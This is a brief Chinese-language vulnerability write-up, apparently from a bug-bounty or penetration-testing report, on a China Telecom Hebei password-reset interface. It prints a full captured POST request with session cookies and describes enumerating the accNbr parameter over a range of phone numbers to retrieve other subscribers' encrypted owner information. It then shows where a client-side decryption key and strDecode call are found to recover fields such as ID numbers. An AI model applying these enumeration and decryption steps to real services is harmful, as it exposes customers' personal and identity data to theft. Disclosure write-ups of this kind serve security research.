敏感信息泄露 可遍历
1、点击额重置密码
需要 校园电信手机号
个人手机账号:193xxxxxx02 获取验证码 发现验证码登陆点击登陆
burpsuit抓包,抓到查询接口
接口
POST /wap_heb/public/resetPwdDeal.jsp?wBqy93ym=uzeSMGlqEDAMFv4Yrd7e2RD5DzehOihK44EZAuBz02NRhUfmGik2Eh.ksL6M HTTP/1.1
Host: x_heb.189.cn
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 48
Connection: close
Cookie: route=8f6d1541b90bd9713d0ace; JSESSIONID=5EA12DAF530BE0B842490; 9mpg8NnStfi5S=5w5ZBzili0UbMfIoSiTVKD_9xuHOdNZ3fiIckp4fjsimbKNrNa9ztanDG2MsGVpmoUnrEYScIa2r85NNxuo3_Iq; insert_cookie=56365047; 9mpg8NnStfi5T=eFjX7GxxsXPCugriDKlYL_cpTAL4Xg.2imVssfBake1f00tQ95NRSYiWJSN1T6_N1GPWkdRI4wf8NdZeojoBMRsbWqxk7SmcYJcJTD1ewzHYwG8XaYr9iqXYHs4_OByQkHDQji7iIUdHa3qfVptQA4MgeRUflggc4J9GPtt4Mn3iyxw8OOs_pPgK.8PGhaHOotLmyUrXXPbDabCMqmcHoh_VXZ2DoHK3_.lGUUaTR2O4HfwIJaB8JZGrLBxC5Bygs2im0bcEQg_oPCP9QQoIgs6bmqOHgJ1t6CmD5USH2roMOLMlbDstIr.37Fwb_xZW4XxmIprEcyEQ
accNbr=xxxxxxxx3635&action=qryOwnerAndUserInfo
accnbr 可以遍历
修改 accnbr的值 得到返回结果
遍历后五位 从 xxxxxxx36525 到 xxxxxx37000
返回结果是加密字符串
在js代码中搜索返回字段名
发现解密密钥和方法
strDecode(json.certNumber,"xxxxxxxR7K!lLhOq","xxxxxxx8","xxxxxxxxnst")
找页面的js代码 ,看是否有解密的代码
找到解密js代码 复制到 vscode中 调用strDecode方法解密